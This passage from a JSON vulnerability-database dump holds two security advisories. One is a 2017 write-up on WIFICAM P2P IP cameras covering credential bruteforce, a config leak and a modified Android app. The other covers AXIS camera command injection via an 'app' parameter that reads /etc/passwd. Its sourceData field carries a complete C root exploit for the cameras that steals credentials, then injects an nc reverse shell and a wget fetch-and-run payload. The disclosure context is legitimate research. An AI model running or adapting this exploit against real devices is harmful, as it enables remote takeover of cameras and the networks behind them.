The cameras answers:\r\n\r\n```\r\nresult=-1;\r\n\r\n```\r\n\r\nDue to the absence of checking, an attacker can simply bruteforce credentials.\r\n\r\n\r\n\r\n### Step 3 in detail:\r\n\r\nThe application sends:\r\n\r\n```\r\nGET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nOR\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nThe camera replies by sending all its configuration in clear-text:\r\n\r\n```\r\nvar now=1122211111;\r\nvar dst_enable=0;\r\nvar dst_time=0;\r\nvar tz=0;\r\nvar ntp_enable=1;\r\nvar ntp_svr=\"time.nist.gov\";\r\nvar dhcpen=1;\r\nvar ip=\"192.168.2.76\";\r\nvar mask=\"255.255.255.0\";\r\nvar gateway=\"192.168.2.1\";\r\nvar dns1=\"8.8.8.8\";\r\nvar dns2=\"192.168.2.1\";\r\nvar port=80;\r\nvar nashost=\"\";\r\nvar nasport=0;\r\nvar dev2_host=\"\";\r\nvar dev2_alias=\"\";\r\nvar dev2_user=\"\";\r\nvar dev2_pwd=\"\";\r\nvar dev2_port=0;\r\nvar dev3_host=\"\";\r\nvar dev3_alias=\"\";\r\nvar dev3_user=\"\";\r\nvar dev3_pwd=\"\";\r\nvar dev3_port=0;\r\nvar dev4_host=\"\";\r\nvar dev4_alias=\"\";\r\nvar dev4_user=\"\";\r\nvar dev4_pwd=\"\";\r\nvar dev4_port=0;\r\nvar dev5_host=\"\";\r\nvar dev5_alias=\"\";\r\nvar dev5_user=\"\";\r\nvar dev5_pwd=\"\";\r\nvar dev5_port=0;\r\nvar dev6_host=\"\";\r\nvar dev6_alias\r\n[...]\r\nvar user1_name=\"\";\r\nvar user1_pwd=\"\";\r\nvar user2_name=\"wut\";\r\nvar user2_pwd=\"wut\";\r\nvar user3_name=\"admin\";\r\nvar user3_pwd=\"admin\";\r\n[...]\r\n\r\n```\r\n\r\nThis is interesting because an attacker can reach a camera only by knowing a serial number. The UDP tunnel between the attacker and the camera is established even if the attacker doesn't know the credentials. It's useful to note the tunnel bypasses NAT and firewall, allowing the attacker to reach internal cameras (if they are connected to the Internet) and to bruteforce credentials. 
Then, the attacker can just try to bruteforce credentials of the camera:\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST&\r\n\r\n```\r\n\r\nThis protocol appears to be common to a lot of Android applications, ie:\r\n\r\n* [object.p2pwificam.client](https://play.google.com/store/apps/details?id=object.p2pwificam.client) (500.000 - 1.000.000 installations)\r\n* [hsl.p2pipcam](https://play.google.com/store/apps/details?id=hsl.p2pipcam) (100.000 - 500.000 installations)\r\n* [object.liouzx.client](https://play.google.com/store/apps/details?id=object.liouzx.client) (100.000 - 500.000 installations)\r\n* [object.lioupp.client](https://play.google.com/store/apps/details?id=object.lioupp.client) (100.000 - 500.000 installations)\r\n* [com.g_zhang.myp2pcam](https://play.google.com/store/apps/details?id=com.g_zhang.myp2pcam) (100.000 - 500.000 installations)\r\n* [object.aisaidezx.client](https://play.google.com/store/apps/details?id=object.aisaidezx.client) (50.000 - 100.000 installations)\r\n* [hsl.cam360](https://play.google.com/store/apps/details?id=hsl.cam360) (10.000 - 50.000 installations)\r\n* [bravocam.p2pipcam](https://play.google.com/store/apps/details?id=bravocam.p2pipcam) (10.000 - 50.000 installations)\r\n* [xcam.p2pipcam](https://play.google.com/store/apps/details?id=xcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [snugcam.p2pipcam](https://play.google.com/store/apps/details?id=snugcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [myview.p2pipcam](https://play.google.com/store/apps/details?id=myview.p2pipcam) (5.000 - 10.000 installations)\r\n* [object.weimaisizx.client](https://play.google.com/store/apps/details?id=object.weimaisizx.client) (10.000 - 50.000 installations)\r\n* [com.tutk.P2PCamLive.Pixord](https://play.google.com/store/apps/details?id=com.tutk.P2PCamLive.Pixord) (10.000 - 50.000 installations)\r\n* [object.p2pnetwork.client](https://play.google.com/store/apps/details?id=object.p2pnetwork.client) (5.000 
- 10.000 installations)\r\n\r\nThis list is very far from being complete.\r\n\r\nSo, I modified the original Android Application in order to try the pre-auth Info-Leak vulnerability:\r\n\r\n```\r\nk% ls -la\r\ntotal 14912\r\ndrwx------ 2 nobody nogroup 100 Mar 7 08:27 .\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\nk% ./apktool d object.p2pwificam.client.apk\r\nI: Using Apktool 2.2.2 on object.p2pwificam.client.apk\r\nI: Loading resource table...\r\nI: Decoding AndroidManifest.xml with resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nI: Loading resource table from file: /tmp/.local/share/apktool/framework/1.apk\r\nI: Regular manifest package...\r\nI: Decoding file-resources...\r\nI: Decoding values */* XMLs...\r\nI: Baksmaling classes.dex...\r\nI: Copying assets and libs...\r\nI: Copying unknown files...\r\nI: Copying original files...\r\nk%\r\n\r\n```\r\n\r\nI edit the library which manages all the custom HTTP requests.\r\n\r\nOne of the interesting string is `GET /%sloginuse=%s&loginpas=%s&user=%s&pwd=%s`:\r\n\r\n```\r\nk% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so\r\n\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l\r\n0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user=\r\n0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect 
begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return:\r\n0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou\r\n0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con\r\n0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m\r\n0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle:\r\n\r\n```\r\n\r\nAfter the modification:\r\n\r\n```\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi\r\n0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x\r\n0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n\r\n```\r\n\r\nThen, let's repack and sign the .apk:\r\n\r\n```\r\nk% ./apktool b object.p2pwificam.client\r\nI: Using Apktool 2.2.2\r\nI: Checking whether sources has changed...\r\nI: Checking whether resources has changed...\r\nI: Building resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nW: warning: string 'conectar' has no default translation.\r\nW: warning: string 'str_ipcamfour' has no default translation.\r\nW: warning: string 'user_pwd_no_show' has no default translation.\r\nI: Copying libs... 
(/lib)\r\nI: Building apk file...\r\nI: Copying unknown files/dir...\r\nk% openssl genrsa -out key.pem\r\n\r\nGenerating RSA private key, 2048 bit long modulus\r\n..........................................+++\r\n...................................................................+++\r\nunable to write 'random state'\r\ne is 65537 (0x010001)\r\nk% openssl req -new -key key.pem -out request.pem\r\n[...]\r\nk% openssl x509 -req -days 9999 -in request.pem -signkey key.pem -out certificate.pem\r\nSignature ok\r\nsubject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd\r\nGetting Private key\r\nunable to write 'random state'\r\nk% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out key.pk8 -nocrypt\r\nk% signapk certificate.pem key.pk8 object.p2pwificam.client/dist/object.p2pwificam.client.apk signed-object.p2pwificam.client.apk\r\nk% ls -latr\r\ntotal 21560\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\ndrwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client\r\n-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem\r\n-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem\r\n-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem\r\n-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8\r\ndrwx------ 3 nobody nogroup 220 Mar 7 08:34 .\r\n-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 signed-object.p2pwificam.client.apk\r\n\r\n```\r\n\r\n`signed-object.p2pwificam.client.apk` is ready to be used.\r\n\r\nWhen using it, we see that:\r\n\r\nThe client indeed sends the `system.ini` request within the UDP tunnel:\r\n\r\n\r\n\r\nThe camera indeed receives this request within the UDP tunnel:\r\n\r\n\r\n\r\nComplete trace is:\r\n\r\n\r\n\r\nIt appears the pre-auth is not easily reachable within the cloud network.\r\n\r\nThis \"cloud\" protocol seems to 
be more of a botnet protocol than a legit remote access protocol and indeed has weaknesses (everything in clear-text, i.e. an attacker can attack cameras within the cloud and leverage potential access to hack internal networks).\r\n\r\nA lot of P2P ('Cloud') cameras are in fact using the same botnet protocols and the same infrastructure, seemingly managed by a single entity.\r\n\r\nWriting a PoC which bruteforces credentials of the remote camera is left as an exercise for the reader.\r\n\r\n## Vendor Response\r\n\r\nDue to difficulties in finding and contacting all the vendors, full-disclosure is applied.\r\n\r\n**I advise you to IMMEDIATELY DISCONNECT cameras from the Internet. Hundreds of thousands of cameras are affected by the 0day Info-Leak. Millions of them are using the insecure Cloud network.**\r\n\r\n## Report Timeline\r\n\r\n* Feb 26, 2017: Vulnerabilities found by Pierre Kim.\r\n* Mar 08, 2017: A public advisory is sent to security mailing lists.\r\n\r\n## Credits\r\n\r\nThese vulnerabilities were found by Pierre Kim ([@PierreKimSec](https://twitter.com/PierreKimSec)).\r\n\r\n## References\r\n\r\n[https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt](https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt)\r\n\r\n[https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html](https://pierrekim.github.io/blog/2017-03-06-camera-goahead-0day.html)\r\n\r\n## Disclaimer\r\n\r\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: [http://creativecommons.org/licenses/by-nc-sa/3.0/](http://creativecommons.org/licenses/by-nc-sa/3.0/)", "published": "2017-03-08T00:00:00", "type": "seebug", "title": "The Wireless IP Camera (P2P) WIFICAM Multiple vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8221", "CVE-2017-8222", "CVE-2017-8223", "CVE-2017-8224", "CVE-2017-8225"], "modified": "2017-03-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92748", "id": "SSV:92748",
"sourceData": "\n #include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\n\r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\nchar * creds(char *argv,\r\n int get_config);\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n\r\n\r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n\r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n\r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n\r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = 
creds(argv[1], 0);\r\n\r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n printf(\"done\\n\");\r\n\r\n printf(\" login = %s\\n\", id);\r\n printf(\" pass = %s\\n\", id + 32);\r\n\r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n\r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n\r\n return (0);\r\n}\r\n\r\n\r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n\r\n\r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n\r\n printf(\"[+] bypassing auth ... 
\");\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n\r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n\r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n\r\n close(sock);\r\n\r\n /*\r\n [ HTTP HEADERS ]\r\n ...\r\n\r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... ....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... \r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n\r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... 
....\r\n\r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n\r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n\r\n\r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n\r\n return (out);\r\n }\r\n }\r\n }\r\n\r\n free(tmp);\r\n\r\n return (NULL);\r\n}\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n\r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n\r\n sock = 0;\r\n\r\n printf(\"[+] %s payload ... 
\", desc);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n\r\n\r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n\r\n return (0);\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92748"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:00", "description": "\nAXIS (Multiple Products) - devtools (Authenticated) Remote Command Execution", "edition": 1, "published": "2016-07-29T00:00:00", "title": "AXIS (Multiple Products) - devtools (Authenticated) Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8257"], "modified": "2016-07-29T00:00:00", "id": "EXPLOITPACK:ACB669AF665DBE40385085A8FAAD529D", "href": "", "sourceData": " _ _ _ _ _ _ _ _ _ _\n / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\\n( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )\n \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/\n\n www.orwelllabs.com\n security advisory\n olsa-2015-8257\n PGP: 79A6CCC0\n\n\n* Advisory Information\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector\n(+) Vendor: AXIS Communications\n(+) Research and Advisory: Orwelllabs\n(+) Advisory URL: 
http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html\n(+) Class: Improper Input Validation [CWE-20]\n(+) CVE Name: CVE-2015-8257\n(+) Remotely Exploitable: Yes\n(+) Locally Exploitable: No\n(+) OLSA-ID: OWLL2015-8257\n(+) Affected Versions: Multiple Products/Firmwares (check the list below)\n(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization\n(+) Owasp IoTTop10: I1, I2\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n\nVulnerability\n+++++++++++++\nAXIS Network Cameras (various models/firmwares) are prone to an authenticated remote\ncommand execution vulnerability. By exploiting this vulnerability, a remote attacker can\nforce the execution of certain unauthorized actions, which may lead to further attacks.\n\nTechnical Details\n+++++++++++++++++\nThe devtools.sh script is responsible for the vulnerability and its 4 attack vectors through the following pages:\n\n\nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app=\nhttp://xxx.xxx.xxx.xxx/app_license_custom.shtml?app=\nhttp://xxx.xxx.xxx.xxx/app_index.shtml?app=\nhttp://xxx.xxx.xxx.xxx/app_params.shtml?app=\n\n\nAn attacker can use the app parameter, which expects the name of a\nlegitimate application, to inject commands in the operating system using\n\"%3B\", for example, to read the contents of /etc/passwd:\n\nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd\n\nThe data entered in the \"app=\" parameter is passed without any sanitization to the\ndevtools.sh script located at: {HTMLROOT}/bin/devtools.sh\n\nThis script contains several functions, namely:\n\nlist()\nstatus()\nmenulist()\nmainpagelink()\nSETTINGSLINK()\nconfvariable()\necho_ssivar_licensekey()\nload_auto_inst_form()\n\nWhen these functions are invoked, they interact with the parameters passed\nby the web application through\nthe affected scripts (e.g. app_license.shtml?app=). 
By injecting the code\nbelow:\n\nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd\n\nThe value passed in \"app\" will be passed directly to the script invoking\ndevtools.sh via shell -c as shown in the process listing below (third line,\ninvoking the confvariable function):\n\n[SNIP]\n 2039 led 25472 S /usr/bin/enldgts -n\n12014 root 0 SW [kworker/0:0]\n13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh\nconfvariable ORW..\n13183 root 2728 R ps -aux PACKAGENAME\n13312 root 0 SW [kworker/3:1]\n13320 root 0 SW [kworker/2:0]\n[SNIP]\n\nThe value \"ORWELLLABS%3Bcat%20/etc/passwd\" is then passed on to the\ncorresponding function (after passing through a conference on \"confvariable\n()\").\n\nconfvariable() {\nlocal val=\nif [ -r \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" ]; then\n. \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" || :\neval val=\\$$2\necho $val\nfi\n}\n\n\nIt then enters the function \"menulist()\", whose main section is located\nbetween lines 127 and 143:\n\n[SNIP]\n127 [ \"$ name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ activeMenu1 = $ APPNAME\" -> true <! - # Else - -> false <! - #\nendif ->, null,\n128 [\n129 [ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = param_ $ APPNAME\" -> true <! - # Else - -> false\n<! - # endif ->, null, []],\n130 EOF\n131 if [-z \"$ LICENSEPAGE\"] || [ \"$ LICENSEPAGE\" axis =]; Then\n132 cat << - EOF\n133 [ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = license_ $ APPNAME\" -> true <! - # Else - -> false\n<! - # endif ->, null, []],\n134 EOF\n135 fi\n136 if [ \"$ LICENSEPAGE\" = custom] && [-r \"$ HTMLROOT / local / $ APPNAME /\nlicense.inc\"]; Then\n137 cat << - EOF\n138 [ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <!\n- # If expr = \"\\ $ ActivePage custom_ = $ APP NAME\" -> true <! - # Else ->\nfalse <! 
- # endif ->, null, []],\n139 EOF\n140 fi\n141 if [-r \"$ HTMLROOT / local / $ APPNAME / about.inc\"]; Then\n142 cat << - EOF\n143 [ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = $ APPNAME\" -> true <! - # Else - > false <! - #\nendif ->, null, []],\n\n\nWhere the important lines are the menus below:\n\n\n/bin/devtools.sh (127):\n[ \"$ Name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr\n= \"\\ $ activeMenu1 = $ APPNAME\" -> true -> false <! - #endif ->, null,\n/bin/devtools.sh (129):\n[ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = param_ -> true <! - # Else -> false < ! - # endif\n->, null, []],\n/bin/devtools.sh (133):\n[ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = License\" -> true <! - # Else -> false <! - # endif\n->, null, []],\n/bin/devtools.sh (138):\n[ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <! - #\nIf expr = \"\\ $ ActivePage = APPNAME\" -> true <! - # Else -> false <! - #\nendif ->, null, []],\n/bin/devtools.sh (143):\n[ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr =\n\"\\ $ ActivePage = $ APPNAME\" - # else -> false <! - # endif ->, null, []],\n\n\nIn PoC presented above, the payload will be triggered in line vector 133 of\ndevtools script ( \"License\" menu) that will:\n\n\n[ \"License\", \"/app_license.shtml\", \"app = ORWELLLABS% 3Bcat% 20\n/etc/passwd& \"HostA, <! - # If expr =\" \\ $ ActivePage = License \"-> true <!\n- # Else -> false <! - # Endif ->, null, []],\n\nAnd when executed echoes the results on the page.\n\n\nImpact\n++++++\nThe impact of this vulnerability is that taking into account the busybox\nthat runs behind (and with root privileges everywhere. 
in all the binaries\nand scripts) it is possible to execute arbitrary commands, create backdoors,\nperform a reverse connection to the attacker's machine, use these devices\nas botnets and for DDoS amplification... the limit is the creativity of\nthe attacker.\n\n\nAffected Products\n+++++++++++++++++\nMultiple Axis Communications Products/Firmware including:\n\n * AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera -\nFirmware 5.41.1.4\n * AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera -\nFirmware 5.70.1.2\n * AXIS A8004-VE Network Video Door Station -\nFirmware 5.85.1.1\n * AXIS P3384 fixed dome Network camera -\nFirmware 6.10.1\n * AXIS P5532-E PTZ Dome Network Camera -\nFirmware 5.41.3.1\n * AXIS Q60-E Network Dome PTZ -\nFirmware 5.65.1.1, 5.41.*, 5.70.1.1\n * AXIS Q7401 Video Encoder -\nFirmware 5.50.4\n * AXIS Q7404 Video Encoder -\nFirmware 5.50.4.*\n * AXIS Q7406 Blade Video Encoder -\nFirmware 5.51.2\n * AXIS Q7411 Video Encoder -\nFirmware 5.90.1\n * AXIS Q7414 Blade Video Encoder -\nFirmware 5.51.2\n * AXIS Q7424-R Video Encoder -\nFirmware 5.50.4\n * AXIS Q7424-R Mk II Video Encoder -\nFirmware 5.51.3\n * AXIS Q7436 Blade Video Encoder -\nFirmware 5.90.1\n\n\nThe list below shows the firmwares affected (and probably these firmwares\nare not available anymore, but just the last version of them; if you are not\nsure, check the hash). All these firmwares (in the second column) have the\nsame \"devtools.sh\" shell script (responsible for triggering the RCE\nvulnerability) embedded. 
